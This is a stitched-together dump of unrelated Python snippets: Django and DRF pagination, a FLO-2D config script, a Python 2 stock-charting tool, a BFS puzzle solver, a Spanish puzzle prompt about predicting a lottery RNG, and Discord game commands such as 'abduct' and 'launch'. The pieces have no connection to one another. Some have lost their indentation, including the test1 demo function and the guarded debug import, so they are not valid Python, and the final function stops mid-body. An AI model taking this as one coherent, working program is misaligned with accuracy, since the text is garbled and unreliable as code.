        Not implemented (Read-only database)
        """
        raise NotImplementedError

    def pop(self, *args):
        """
        Not implemented (Read-only database)
        """
        raise NotImplementedError

    def popitem(self):
        """
        Not implemented (Read-only database)
        """
        raise NotImplementedError
|
from django.core.paginator import Paginator, InvalidPage, EmptyPage
from django.core.urlresolvers import reverse
from models import Post
def main(request):
    """Render the paginated post list: 2 posts per page, newest first."""
    # BUG FIX: render_to_response was never imported at module level,
    # so this view raised NameError on every request.
    from django.shortcuts import render_to_response

    posts = Post.objects.all().order_by("-created")
    paginator = Paginator(posts, 2)
    # A missing or non-numeric ?page= falls back to page 1.
    try:
        page = int(request.GET.get("page", '1'))
    except ValueError:
        page = 1
    # Out-of-range page numbers clamp to the last page.
    try:
        posts = paginator.page(page)
    except (InvalidPage, EmptyPage):
        posts = paginator.page(paginator.num_pages)
    return render_to_response("list.html", dict(posts=posts, user=request.user))
# Create your views here.
|
from rest_framework.pagination import LimitOffsetPagination, PageNumberPagination
class ArticleLimitOffsetPagination(LimitOffsetPagination):
    """?limit=/?offset= pagination for articles: 2 items when no limit is
    given, and clients may request at most 3 per page."""
    default_limit = 2
    max_limit = 3
class ArticlePageNumberPagination(PageNumberPagination):
    """?page= pagination for articles, fixed at 2 items per page."""
    page_size = 2
|
import main
from argparse import Namespace
# for submission in api.getContestSubmissions(1003,'minhphuoc1998'):
# print(submission['id'])
# api.API.getContestResult(1003,'minhphuoc1998')
# print(api.API.getContestInfo(1003))
# This equal to :
# python main.py -contests 1003 1004 1005 -users ferez.96 minhphuoc1998
# Hard-coded stand-in for CLI parsing: build the namespace main.main expects
# and run it directly (equivalent to the invocation documented above).
args = Namespace(contests=[1003, 1004, 1005], users=['ferez.96', 'minhphuoc1998'])
main.main(args)
|
#主要看内存地址变化没,可变类型,不可变类型
#显示data是100,函数调用后a也是100,a后来赋值200,是不可变类型,现在就是data是100,a是200
# def test1(a):
# a = 200
# print('test1--- %d' % a)
# data = 100 # data 是一个数字
# test1(data)
# print('main --- %d' % data)
#列表是可变类型,data是[11],a是[11],a.append(22),内存地址不变,data和a一样
# def test1(a):
# a.append(22)
# print('test1--- %s' % a)
# data = [11] # data 是一个列表
# test1(data)
# print('main --- %s' % data)
#开始data是[11],a是[11],后来a赋值[],内存地址变了,data没变,a是[22]
def test1(a):
a = []
a.append(22)
print('test1--- %s' % a)
data = [11] # data 是一个列表
test1(data)
print('main --- %s' % data)
#函数内修改i全局变量
# def test1(a):
# global data
# data = [22]
# print('test1--- %s' % data)
# data = [11] # data 是一个列表
# test1(data)
# print('main --- %s' % data) |
from snack import *
import gettext
#import os
class Menu:
    """Thin wrapper around snack's ListboxChoiceWindow for simple menus."""

    def __init__(self, texto, ancho=60, altomenu=25, opciones=None, titulo='',
                 scroll=0, screen=None, posicion=0):
        self.texto = texto
        self.screen = screen
        self.altomenu = altomenu
        self.scroll = scroll
        # An empty title falls back to a translated placeholder.
        self.titulo = gettext.gettext("No title") if titulo == "" else titulo
        self.items = list(opciones)
        # Turn scrolling on whenever the options overflow the menu height.
        if len(self.items) > self.altomenu:
            self.scroll = 1

    def showMenu(self):
        """Display the listbox; return the chosen item, or None on cancel."""
        self.button, rta = ListboxChoiceWindow(self.screen,
                                               self.titulo,
                                               self.texto,
                                               self.items,
                                               width=65,
                                               height=17,
                                               help=None)
        if self.button == 'cancel':
            self.screen.finish()
            rta = None
        return rta
|
import getopt
import sys
from datetime import datetime, timedelta
WIN_OUTPUT_DIR_PATH = r"D:\flo2d_output"

# Module-level configuration for a FLO-2D post-processing run, optionally
# overridden from the command line (-s/--start, -e/--end, -i/--input,
# -g/--grid).
try:
    buf_size = 65536

    # Defaults — assigned BEFORE option parsing.  (BUG FIX: they were
    # previously assigned afterwards, silently clobbering any -s/-e values
    # supplied on the command line.)
    GRID_SIZE = 250
    INPUT = '2016May'
    START_HOUR = 0.00
    END_HOUR = 96.00
    WATER_LEVEL_DEPTH_MIN = 0.15

    try:
        opts, args = getopt.getopt(sys.argv[1:], "s:e:i:g:",
                                   ["start=", "end=", "input=", "grid="])
    except getopt.GetoptError as er:
        # BUG FIX: the old handler printed 'opts'/'args', which are unbound
        # when getopt() itself raised — that was a NameError.
        print('GetoptError : ', er)
        sys.exit(2)

    for opt, arg in opts:
        if opt in ("-s", "--start"):
            START_HOUR = float(arg)
        elif opt in ("-e", "--end"):
            END_HOUR = float(arg)
        elif opt in ("-i", "--input"):
            INPUT = arg
        elif opt in ("-g", "--grid"):
            GRID_SIZE = int(arg)

    # 'datetime' is the class here (from datetime import datetime), so call
    # it directly — 'datetime.datetime.now()' raised AttributeError before.
    # Round-tripping through strftime/strptime truncates "now" to midnight.
    RUN_DATE = datetime.strptime(datetime.now().strftime("%Y-%m-%d"),
                                 '%Y-%m-%d')

    MODEL_FOLDER = 'input/{}/'.format(INPUT)
    TIMEDEP_FILE_PATH = MODEL_FOLDER + 'TIMDEP.OUT'
    CADPTS_DAT_FILE_PATH = MODEL_FOLDER + 'CADPTS.DAT'
    WATER_LEVEL_FILE = 'water_level.asc'
    ASCII_DIR = MODEL_FOLDER + 'ASCII'
except Exception as e:
    print("Exception|e : ", e)
|
#finalgraph.py
import urllib2
import time
import datetime
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.ticker as mticker
import matplotlib.dates as mdates
from matplotlib.finance import candlestick #candlestick
import matplotlib.animation as animation
import matplotlib
import pylab
matplotlib.rcParams.update({'font.size':9})  # global default font size for every chart
def rsiFunc(prices, n=14):
    """Relative Strength Index over an n-period window (Wilder smoothing).

    Conventionally RSI above 70 is read as overbought and below 30 as
    oversold.  Returns an array the same length as `prices`; the first n
    entries are filled with the seed value.
    """
    deltas = np.diff(prices)
    # Seed the running gain/loss averages from the first n+1 deltas.
    seed = deltas[:n + 1]
    avg_gain = seed[seed >= 0].sum() / n
    avg_loss = -seed[seed < 0].sum() / n

    rsi = np.zeros_like(prices)
    rsi[:n] = 100 - 100 / (1 + avg_gain / avg_loss)

    # Wilder smoothing for every subsequent period.
    for i in range(n, len(prices)):
        delta = deltas[i - 1]
        gain = delta if delta > 0 else 0.
        loss = -delta if delta <= 0 else 0.
        avg_gain = (avg_gain * (n - 1) + gain) / n
        avg_loss = (avg_loss * (n - 1) + loss) / n
        rsi[i] = 100 - 100 / (1 + avg_gain / avg_loss)
    return rsi
def movingAverage(values, window):
    """Simple moving average: the mean over each length-`window` slice.

    Returns an array of length len(values) - window + 1 ('valid' mode).
    """
    kernel = np.full(window, 1.0 / window)
    return np.convolve(values, kernel, 'valid')
def expMovingAverage(values, window):
    """Exponentially weighted moving average favouring recent samples."""
    # Normalized exponential kernel: most weight on the newest point.
    kernel = np.exp(np.linspace(-1.0, 0.0, window))
    kernel /= kernel.sum()
    ema = np.convolve(values, kernel, mode='full')[:len(values)]
    # The first `window` outputs have incomplete support; clamp them to the
    # first fully-supported value.
    ema[:window] = ema[window]
    return ema
def computeMACD(x, slow=26, fast = 12):
    """Moving Average Convergence/Divergence over 12- and 26-period EMAs.

    macd line  = fast EMA - slow EMA (exponential moving averages)
    signal line = 9-period EMA of the macd line (computed by the caller)
    histogram  = macd line - signal line

    Returns the tuple (slow EMA, fast EMA, macd line).
    """
    ema_slow = expMovingAverage(x, slow)
    ema_fast = expMovingAverage(x, fast)
    return ema_slow, ema_fast, ema_fast - ema_slow
def graphData(stock, MA1, MA2):
    """Fetch ~3 days of intraday quotes for `stock` from the Yahoo chart API
    and redraw the global `fig` with four panes: RSI (top), candlesticks
    with MA1/MA2 moving averages, a volume overlay, and MACD (bottom).

    NOTE(review): Python 2 only — print statements, `except X, e` syntax,
    urllib2, and the long-removed matplotlib.finance/axisbg APIs.
    """
    fig.clf() #moving average 1, moving average 2
    try:
        # --- Pull and normalize the raw quote data -----------------------
        try:
            print'pulling data on', stock, 'at', str(datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
            urlToVisit = 'http://chartapi.finance.yahoo.com/instrument/1.0/'+stock+'/chartdata;type=quote;range=3d/csv'
            stockFile=[]
            try:
                sourceCode=urllib2.urlopen(urlToVisit).read()
                splitSource= sourceCode.split('\n')
                for eachLine in splitSource:
                    splitLine = eachLine.split(',')
                    # First CSV field is a unix timestamp; rewrite it as a
                    # human-readable datetime so loadtxt can parse it below.
                    fixMe = splitLine[0]
                    if len(splitLine)==6:
                        if 'values' not in eachLine:
                            fixed = eachLine.replace(fixMe, str(datetime.datetime.fromtimestamp(int(fixMe)).strftime('%Y-%m-%d %H:%M:%S')))
                            stockFile.append(fixed)
            except Exception, e:
                print str(e), 'failed to organize pulled data'
        except Exception, e:
            print str(e), 'failed to pull price data'
##        stockFile = 'oneDayOHLC/'+stock+ '.txt'
        date, closep, highp, lowp, openp, volume = np.loadtxt(stockFile, delimiter=',', unpack=True,
                                                              converters={ 0:mdates.strpdate2num('%Y-%m-%d %H:%M:%S')})
        ####
        # Build the (date, open, close, high, low, volume) tuples that
        # candlestick() expects.
        x = 0
        y = len(date)
        candleAr = []
        while x<y:
            appendLine = date[x],openp[x], closep[x], highp[x],lowp[x],volume[x]
            candleAr.append(appendLine)
            x+=1
        #build the array
        #(openp, closep, highp, lowp, volume)
        #only open p and close p candlestick
        Av1 = movingAverage(closep, MA1) #use the close value
        Av2 = movingAverage(closep, MA2)
        SP = len(date[MA2-1:])
        #starting point #can mess around with MA2 and the length
        label1=str(MA1)+' daysMovingAverage'
        label2=str(MA2)+' daysMA'
        #off black #background color
        # --- ax1: candlestick price pane with both moving averages -------
        ax1 = plt.subplot2grid((6,4),(1,0), rowspan=4, colspan=4,axisbg='#07000d')
        candlestick(ax1, candleAr[-SP:], width=.00001,colorup='#54C156',colordown='#ff1717') #-SP to have average value on all candlesticks
        ax1.plot(date[-SP:],Av1[-SP:],color='#e1edf9',label=label1, linewidth=1.0) #color white blue ish
        ax1.plot(date[-SP:],Av2[-SP:],color='#4ee6fd',label=label2, linewidth=1.0) #off white#e1edf9
        ####
        ax1.grid(True, color='w')
        #when it goes up-green(g). when it goes down it is red(r)
        #DATA=the format is important
        #already did that with the while loop
        ax1.grid(True) #we want that grid
        ax1.xaxis.set_major_locator(mticker.MaxNLocator(31)) # number here is the interval
        ax1.xaxis.set_major_formatter(mdates.DateFormatter('%y%m%d %H:%M'))
        plt.gca().yaxis.set_major_locator(mticker.MaxNLocator(prune='upper'))
        ax1.yaxis.label.set_color('w')
        ax1.spines['bottom'].set_color('#5998ff')
        ax1.spines['top'].set_color('#5998ff')
        ax1.spines['left'].set_color('#5998ff')
        ax1.spines['right'].set_color('#5998ff')#ligt blue
        ax1.tick_params(axis='y', colors='w')
        ax1.tick_params(axis='x', colors='w')
        plt.ylabel(stock+"'s Stock Price and Volume")
        maLeg = plt.legend(loc=9, ncol=2, prop={'size':7}, fancybox=True)
        maLeg.get_frame().set_alpha(0.4)
        textEd = pylab.gca().get_legend().get_texts()
        pylab.setp(textEd[0:5], color ='w') #can have more than 5 moving average
        # --- ax0: RSI pane (shares the x axis with ax1) -------------------
        ax0 = plt.subplot2grid((6,4),(0,0),sharex=ax1, rowspan=1, colspan=4,axisbg='#07000d')
        rsiCol = '#c1f9f7'
        posCol= '#386d13'
        negCol='#8f2020'
        rsi = rsiFunc(closep) #close price #can change the closep #can have more than 14 days(defaulted)
        #can try average
        #can try average average(more complicated than just average)
        #can try open p and openp-closep
        ax0.plot(date[-SP:], rsi[-SP:], rsiCol, linewidth=1.5)
        ax0.axhline(70,color = negCol)
        ax0.axhline(30, color = posCol)
        ax0.fill_between(date[-SP:], rsi[-SP:], 70, where=(rsi[-SP:]>=70), facecolor=negCol, edgecolor= negCol)
        ax0.fill_between(date[-SP:], rsi[-SP:], 30, where=(rsi[-SP:]<=30), facecolor=posCol, edgecolor= posCol)
        ax0.set_ylim(0,100) #range for rsi is 100
        ax0.spines['bottom'].set_color('#5998ff')
        ax0.spines['top'].set_color('#5998ff')
        ax0.spines['left'].set_color('#5998ff')
        ax0.spines['right'].set_color('#5998ff')
        ax0.text(0.00000001, 0.99995, 'RSI(14)', va='center', color='w', transform=ax0.transAxes)
        #14 is hardcoded. it can be put in other variables
        ax0.tick_params(axis='x', colors='w')
        ax0.tick_params(axis='y', colors='w')
        ax0.set_yticks([30,70])
        ax0.yaxis.label.set_color('w')
#        plt.gca().yaxis.set_major_locator(mticker.MaxNLocator(prune='upper'))
        plt.ylabel('RSI')
        volumeMin = 0 #volume.min() #how low to filler
        ####
        # --- ax1v: volume overlay on a twinned y axis ---------------------
        ax1v = ax1.twinx() #volume axis share the xaxis #the volume axis #overlay
        #usually ppl just look at the amplitude
        ax1v.fill_between(date[-SP:],volumeMin,volume[-SP:], facecolor='#00ffe8', alpha=.5) #fill
        ax1v.axes.yaxis.set_ticklabels([])
        ax1v.grid(False)
        ax1v.spines['bottom'].set_color('#5998ff')
        ax1v.spines['top'].set_color('#5998ff')
        ax1v.spines['left'].set_color('#5998ff')
        ax1v.spines['right'].set_color('#5998ff')
        ax1v.set_ylim(0,3.5*volume.max()) #how the volume axis dominates the graph
        ax1v.tick_params(axis='x', colors='w')
        ax1v.tick_params(axis='y', colors='w')
        plt.subplots_adjust(left=0.09, bottom=.18, right=.95, top=.94, wspace=.20,hspace=0)
        plt.xlabel('Date', color='w')
        # --- ax2: MACD pane with signal-line crossover markers ------------
        ax2 = plt.subplot2grid((6,4), (5,0), sharex=ax1, rowspan=1, colspan=4,axisbg='#07000d')
        fillcolor='#00ffe8'
        nslow = 26
        nfast = 12
        nema=9
        emaslow, emafast, macd = computeMACD(closep) #usign closep
        ema9 = expMovingAverage(macd, nema) #macd?
        plt1 = ax2.plot(date[-SP:], macd[-SP:],color='#4eeffd', lw=2)
        plt2 = ax2.plot(date[-SP:], ema9[-SP:],color='#e1edf9', lw=1)
        ax2.fill_between(date[-SP:], macd[-SP:]-ema9[-SP:], 0, alpha=0.55, facecolor = fillcolor, edgecolor=fillcolor)
##        ax2.text(0.5, 0.95, 'MACD 12, 26, 9', va= 'bottom', color='w', transform=ax2.transAxes)
        ax2.spines['bottom'].set_color('#5998ff')
        ax2.spines['top'].set_color('#5998ff')
        ax2.spines['left'].set_color('#5998ff')
        ax2.spines['right'].set_color('#5998ff')
        ax2.tick_params(axis='x', colors='w')
        ax2.tick_params(axis='y', colors='w')
        plt.ylabel('MACD', color='w')
        ##
        ax2.legend(('MACD', 'EMA9'), loc='lower left',prop={'size':5.5}, fancybox = True, framealpha = 0.5)
        ax1.text(0.001, 0.05,str(datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')+' Current Price: '+str(round(closep[-1],3))), va='top', color='yellow', transform=ax1.transAxes)
        ax2.yaxis.set_major_locator(mticker.MaxNLocator(nbins=5,prune='upper'))
        for label in ax2.xaxis.get_ticklabels():
            label.set_rotation(45)
        # Mark MACD/signal crossovers: red dot on upward cross, green on
        # downward.  Interpolation is a crude midpoint, not the true root.
        for i in range(int(len(date))-int(SP), int(len(date))):
            #this can be imporved a lot; like where exactly interesection happens
            ##THIS JUST PROVED THE EXISTENCE OF THE INERSECTION
            if macd[i]>ema9[i] and macd[i-1]<ema9[i-1]:
                ax2.plot((date[i]+date[i-1])/2, (macd[i]+ema9[i])/2, 'ro')
            if macd[i]<ema9[i] and macd[i-1]>ema9[i-1]:
                ax2.plot((date[i]+date[i-1])/2, (ema9[i]+macd[i])/2, 'go')
            else:
                continue
        # Tint the whole figure by the latest tick direction.
        if closep[-1]>closep[-2]:
            fig.patch.set_facecolor('#333300')
        elif closep[-1]< closep[-2]:
            fig.patch.set_facecolor('#600000')
        else:
            fig.patch.set_facecolor('w')
        ax0.text(0.001, 0.05, str(datetime.datetime.fromtimestamp(time.time()).strftime('%H:%M:%S')+' Current RSI: '+str(round(rsi[-1],3))), va='center', color='yellow', transform=ax0.transAxes)
        ax2.text(0.01, 0.95,'MACD 12, 26, 9 -- '+str(datetime.datetime.fromtimestamp(time.time()).strftime('%H:%M:%S')+' Current MACD: '+str(round(macd[-1],3))), va='center', color='yellow', transform=ax2.transAxes)
        plt.suptitle(stock, color='w')
        plt.setp(ax0.get_xticklabels(), visible=False)
        plt.setp(ax1.get_xticklabels(), visible=False)
##        plt.show()
##        fig.savefig('Example2WithNotCandlestick.png', facecolor=fig.get_facecolor()) #save the figure after you cross it
    except Exception, e:
        print 'Failed main loop--', str(e)
###
# Shared figure redrawn by the animation callback (Python 2 script).
fig = plt.figure(facecolor='#07000d')
def animate(i):
    # FuncAnimation callback: redraw the chart every interval.
    graphData(stockToUse,12,26) #12 periods and 26 periods
# Prompt for a ticker, then redraw its chart once a minute until the window
# is closed; the loop then prompts for the next ticker.
while True:
    stockToUse = raw_input('Stock to Chart: ')
    ani = animation.FuncAnimation(fig, animate, interval = 60000)
    plt.show()
##    time.sleep(3600)
|
def mode(nums):
    """Return most-common number in list.

    For this function, there will always be a single-most-common value;
    you do not need to worry about handling cases where more than one item
    occurs the same number of times.

    >>> mode([1, 2, 1])
    1

    >>> mode([2, 2, 3, 3, 2])
    2
    """
    # Counter does a single O(n) pass; the previous hand-rolled nested scan
    # was O(n^2).
    from collections import Counter
    return Counter(nums).most_common(1)[0][0]
# Quick smoke checks (should print 1 and 2; see the doctests in mode()).
print(mode([1, 2, 1]))
print(mode([2, 2, 3, 3, 2]))
|
from collections import deque
# BFS over positions 1..N for two actors whose step size doubles each turn
# (2**(t-1) left or right).  Prints the first time step at which one actor
# can land on a cell the other reaches at the same time, else -1.
N, A, B = map(int, input().split())
# Queue entry: [0] = current position, [1] = timeline (turn number),
# [2] = which actor is moving (0 = first, 1 = second).
queue = deque()
queue.append([A, 1, 0])
queue.append([B, 1, 1])
# Only simultaneity matters while moving, so it is enough to track the
# timeline per cell; a given time step never repeats, so no duplicates.
time = [[1] * (N+1) for _ in range(2)]
flag = False
while queue and not flag:
    cur_pos, timeline, kind= queue.popleft()
    # Jump distance doubles every turn: +/- 2**(timeline-1).
    for elm in [-2**(timeline-1), 2**(timeline-1)]:
        if cur_pos + elm < 1 or cur_pos + elm > N: continue
        # The other actor (kind^1) reaches this cell at the same next tick.
        if time[kind^1][cur_pos + elm] == timeline + 1:
            print(timeline)
            flag = True
            break
        queue.append([cur_pos + elm, timeline + 1, kind])
        time[kind][cur_pos + elm] = timeline + 1
if not flag: print(-1)
# coding: utf-8
# Es el año 2049 y todavía existen las loterias, esta particular sortea con numeros de 16 bits todos los días a la medianoche. La leyenda cuenta que esta implementada en assembler de 6502, y sospechamos que el generador de numeros al azar no sería fuerte.
#
# A continucación estan los resultados para el dia 17/06/2049, donde 0x0ce9 se lleva el premio mayor y 0x99dc es el segundo premio.
#
# Cuales serán los numeros que se lleven el premio mayor para los próximos 4 días ?
#
# Podes encontrar el adjunto en https://s3.amazonaws.com/it.challenge/level5.txt
# vim: set ts=4 sw=4 tw=79 et :
|
import asyncio
from time import time
from ew.static import cfg as ewcfg
from ew.static import poi as poi_static
from ew.utils import core as ewutils
from ew.utils import frontend as fe_utils
from ew.utils import rolemgr as ewrolemgr
from ew.utils.combat import EwUser
from ew.utils.district import EwDistrict
from ew.backend.dungeons import EwGamestate
from ew.backend.item import EwItem
from ew.backend import item as bknd_item
try:
from ew.cmd import debug as ewdebug
except:
from ew.cmd import debug_dummy as ewdebug
"""
Informs the player about their current zone's capture progress
"""
async def capture_progress(cmd):
    """Reply with the capture state of the invoking player's current zone."""
    user_data = EwUser(member=cmd.message.author)
    response = ""
    poi = poi_static.id_to_poi.get(user_data.poi)
    response += "**{}**: ".format(poi.str_name)
    # Bail out early for zones that can never be captured.
    if not user_data.poi in poi_static.capturable_districts:
        response += "This zone cannot be captured."
        return await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
    district_data = EwDistrict(id_server=user_data.id_server, district=user_data.poi)
    # Whole-number percentage of the district's capture-point cap.
    percent_progress_after = int(district_data.capture_points / district_data.max_capture_points * 100)
    # Describe who is acting on the district: de-capturing an owned zone,
    # consolidating their own, merely holding it, capturing a neutral one,
    # or nothing at all.
    if district_data.capturing_faction not in ["", district_data.controlling_faction] and district_data.controlling_faction != '':
        response += "{} have been de-capturing this district. ".format(district_data.capturing_faction.capitalize())
    elif district_data.controlling_faction == district_data.capturing_faction and district_data.controlling_faction != '':
        response += "{} have been tightening control of this district. ".format(district_data.capturing_faction.capitalize())
    elif district_data.controlling_faction != "":
        response += "{} control this district. ".format(district_data.controlling_faction.capitalize())
    elif district_data.capturing_faction != "":
        response += "{} have been capturing this district. ".format(district_data.capturing_faction.capitalize())
    else:
        response += "Nobody has staked a claim to this district yet. "
    # time_unlock > 0 appears to mean the district is temporarily
    # capture-locked — TODO confirm against EwDistrict.
    if district_data.time_unlock > 0:
        response += "\n\n**It's impossible to capture at the moment.**"
        if not district_data.all_neighbors_friendly():
            response += "But the lock is starting to decay..."
    response += "Current progress: {progress}%".format(progress=percent_progress_after)
    return await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
async def change_spray(cmd):
    """Set the invoking player's graffiti spray to the supplied image link."""
    user_data = EwUser(member=cmd.message.author)
    # Everything after the command token is treated as the new spray link.
    newspray = cmd.message.content[(len(ewcfg.cmd_changespray)):].strip()
    if not newspray:
        response = "You need to add an image link to change your spray."
    elif len(newspray) > 400:
        response = "Fucking christ, are you painting the Sistine Chapel? Use a shorter link."
    else:
        user_data.spray = newspray
        user_data.persist()
        response = "Got it. Spray set."
    return await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
async def tag(cmd):
    """Reply with the player's spray if they are gang-affiliated, else refuse."""
    user_data = EwUser(member=cmd.message.author)
    is_gangster = user_data.life_state in (ewcfg.life_state_enlisted, ewcfg.life_state_kingpin)
    if is_gangster:
        response = user_data.spray
    else:
        response = "Save the spraying for the gangsters. You're either too gay or dead to participate in this sort of thing."
    return await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
async def ufo_observe(cmd):
    """Aim the UFO's observation reticle at a district, granting everyone
    aboard read access to that district's channel.

    Requires being aboard the UFO with an adorned skinsuit, the ship
    airborne, the right event stage, and a spyable outdoor target POI.
    """
    user_data = EwUser(member = cmd.message.author)
    cosmetics = bknd_item.inventory(id_user=user_data.id_user, id_server=cmd.guild.id, item_type_filter=ewcfg.it_cosmetic)
    # An adorned skinsuit cosmetic marks the player as disguised.
    protected = False
    for cosmetic in cosmetics:
        cosmetic_data = EwItem(id_item=cosmetic.get('id_item'))
        if cosmetic_data.item_props.get('id_cosmetic') == 'skinsuit':
            if cosmetic_data.item_props.get('adorned') == 'true':
                protected = True
    shipstate = EwGamestate(id_state='shipstate', id_server=cmd.guild.id)
    if user_data.poi != 'ufoufo':
        # Not aboard the UFO at all — hand off to the debug handler.
        return await ewdebug.scrutinize(cmd=cmd)
    elif not protected:
        response = "Those aliens would probably ass-probe the fuck out of you if you messed with their equipment. Better not."
    elif shipstate.bit == 1:
        # shipstate.bit == 1 appears to mean "grounded" — see launch().
        response = "The ship is grounded. Can't see much from here."
    elif cmd.tokens_count <= 1:
        response = "Observe what?"
    elif not ewcfg.dh_active or ewcfg.dh_stage != 300:
        response = "Wait, your alien espionage is waaaay out of season."
    else:
        poi_seek = ewutils.flattenTokenListToString(cmd.tokens[1:])
        poi_sought = poi_static.id_to_poi.get(poi_seek)
        if poi_sought is None:
            response = "The aliens know all the district names. You don't have to make up weird shit."
        elif poi_sought.id_poi == 'ufoufo':
            return await ewdebug.scrutinize(cmd=cmd)
        elif poi_sought.is_street:
            response = "You try to zoom in on a specific street, but you're a little too high up to get that level of detail."
        elif poi_sought.id_poi == 'blackpond' or (not poi_sought.is_district and not poi_sought.is_outskirts and not poi_sought.is_pier and poi_sought.id_poi not in [ewcfg.poi_id_slimesendcliffs, ewcfg.poi_id_ferry, ewcfg.poi_id_sodafountain, ewcfg.poi_id_stockexchange, ewcfg.poi_id_ab_farms, ewcfg.poi_id_og_farms, ewcfg.poi_id_jr_farms]):
            # Only outdoor POIs (districts/outskirts/piers and a short
            # allow-list) can be observed.
            response = "The X-ray vision on this viewport sucks. You can't really see indoors."
        elif poi_sought.id_poi in [ewcfg.poi_id_rowdyroughhouse, ewcfg.poi_id_copkilltown]:
            response = "Do you want to blow your cover, dumbass? Stop acting like a gangster. The gang bases are mostly indoors anyway."
        else:
            # Grant the UFO channel read access to the observed district,
            # then refresh roles for everyone currently aboard so Discord
            # picks up the new permissions.
            new_permissions = {"ufo-ufo": ["read", "send", "connect"]}
            new_permissions[poi_sought.channel] = ["read"]
            current_poi = poi_static.id_to_poi.get('ufoufo')
            response = ""
            if current_poi is not None:
                response = 'You point the observation reticle over at {}.'.format(poi_sought.str_name)
            district_data = EwDistrict(id_server=cmd.guild.id, district='ufoufo')
            poi_static.id_to_poi['ufoufo'].permissions = new_permissions
            players_in_district = district_data.get_players_in_district(min_slimes=0, life_states=[ewcfg.life_state_enlisted, ewcfg.life_state_corpse, ewcfg.life_state_juvenile], ignore_offline=True)
            server = ewcfg.server_list[cmd.guild.id]
            for playerid in players_in_district:
                member_object = await fe_utils.get_member(server, playerid)
                await ewrolemgr.updateRoles(client=cmd.client, member=member_object)
    return await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
async def launch(cmd):
    """Toggle the UFO between airborne (bit 0) and grounded (bit 1).

    Only works while aboard the UFO, disguised with an adorned skinsuit,
    and during the right event stage.
    """
    user_data = EwUser(member=cmd.message.author)
    # A player counts as disguised only with an adorned skinsuit cosmetic.
    protected = False
    cosmetics = bknd_item.inventory(id_user=user_data.id_user, id_server=cmd.guild.id, item_type_filter=ewcfg.it_cosmetic)
    for cosmetic in cosmetics:
        cosmetic_data = EwItem(id_item=cosmetic.get('id_item'))
        if cosmetic_data.item_props.get('id_cosmetic') == 'skinsuit' and cosmetic_data.item_props.get('adorned') == 'true':
            protected = True
    if user_data.poi != 'ufoufo':
        response = "Launch what, dumbass? My patience?"
    elif not protected:
        response = "The aliens aren't gonna let you start the ship. You're basically their captive now."
    elif not ewcfg.dh_active or ewcfg.dh_stage != 300:
        response = "Wait, your alien espionage is waaaay out of season."
    else:
        launchstate = EwGamestate(id_state='shipstate', id_server=cmd.guild.id)
        if launchstate.bit == 1:
            # Grounded -> airborne.
            launchstate.bit = 0
            response = "PCHOOOOOOOOOO! Weird bleeps and bloops begin to increase in frequency as the ship rises back into the air!"
        else:
            # Airborne -> crashed back down.
            launchstate.bit = 1
            response = "WHOOOOOOOO -CRASH! Your poor piloting crashes the ship back down. Your fellow alien crew seems excited, like you just chugged a whole bottle of their galactic lager or something. Good thing the hull is so shock resistant or you wouldn't be able to joyride again."
        launchstate.persist()
    return await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
async def abduct(cmd):
    """!abduct — spend a battery pack to beam a mentioned player up to the UFO.

    Requires being aboard the ship ('ufoufo') while disguised in an adorned
    skinsuit, during the right event stage, with the ship airborne, and the
    target standing somewhere outdoors.
    """
    user_data = EwUser(member=cmd.message.author)
    # Fuel for the tractor beam; consumed on a successful abduction.
    item_sought = bknd_item.find_item(item_search='batterypack', id_user=cmd.message.author.id, id_server=cmd.guild.id)
    # Disguise check: an adorned skinsuit marks the player as "one of the aliens".
    protected = False
    cosmetics = bknd_item.inventory(id_user=user_data.id_user, id_server=cmd.guild.id,
                                    item_type_filter=ewcfg.it_cosmetic)
    for cosmetic in cosmetics:
        cosmetic_data = EwItem(id_item=cosmetic.get('id_item'))
        if cosmetic_data.item_props.get('id_cosmetic') == 'skinsuit':
            if cosmetic_data.item_props.get('adorned') == 'true':
                protected = True
    shipstate = EwGamestate(id_server=user_data.id_server, id_state='shipstate')
    if user_data.poi != 'ufoufo':
        response = "Abduct what, dumbass? My patience?"
    elif not protected:
        response = "The aliens aren't gonna let you start the ship. You're basically their captive now."
    # NOTE(review): launch/beam_me_up gate on dh_stage != 300; this uses != 30 — confirm which stage is correct.
    elif not ewcfg.dh_active or ewcfg.dh_stage != 30:
        response = "Wait, your alien espionage is waaaay out of season."
    elif cmd.mentions_count == 0:
        response = "Abduct who?"
    elif cmd.mentions_count > 1:
        response = "One victim at a time, please."
    elif shipstate.bit == 1:
        response = 'The ship\'s on the ground right now, it can\'t reach you.'
    else:
        if item_sought:
            target_data = EwUser(member = cmd.mentions[0])
            target_poi = poi_static.id_to_poi.get(target_data.poi)
            target_channel = fe_utils.get_channel(cmd.message.guild, target_poi.channel)
            # The beam only works outdoors: districts, outskirts, piers, and a few special POIs.
            if target_poi.id_poi == 'blackpond' or (
                    not target_poi.is_district and not target_poi.is_outskirts and not target_poi.is_pier and target_poi.id_poi not in [
                    ewcfg.poi_id_slimesendcliffs, ewcfg.poi_id_ferry, ewcfg.poi_id_sodafountain,
                    ewcfg.poi_id_stockexchange, ewcfg.poi_id_ab_farms, ewcfg.poi_id_og_farms, ewcfg.poi_id_jr_farms]):
                response = "The tractor beam on this ship sucks. You can't really see indoors."
                return await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
            elif target_poi.id_poi in [ewcfg.poi_id_rowdyroughhouse, ewcfg.poi_id_copkilltown]:
                response = "Don't do that."
                return await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
            # Consume the battery pack and freeze the target's movement while the beam pulls.
            bknd_item.item_delete(id_item=item_sought.get('id_item'))
            ewutils.moves_active[target_data.id_user] = 0
            response = 'You plug in your battery pack and begin to abduct {} They\'re 20 seconds away.'.format(cmd.mentions[0].display_name)
            await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
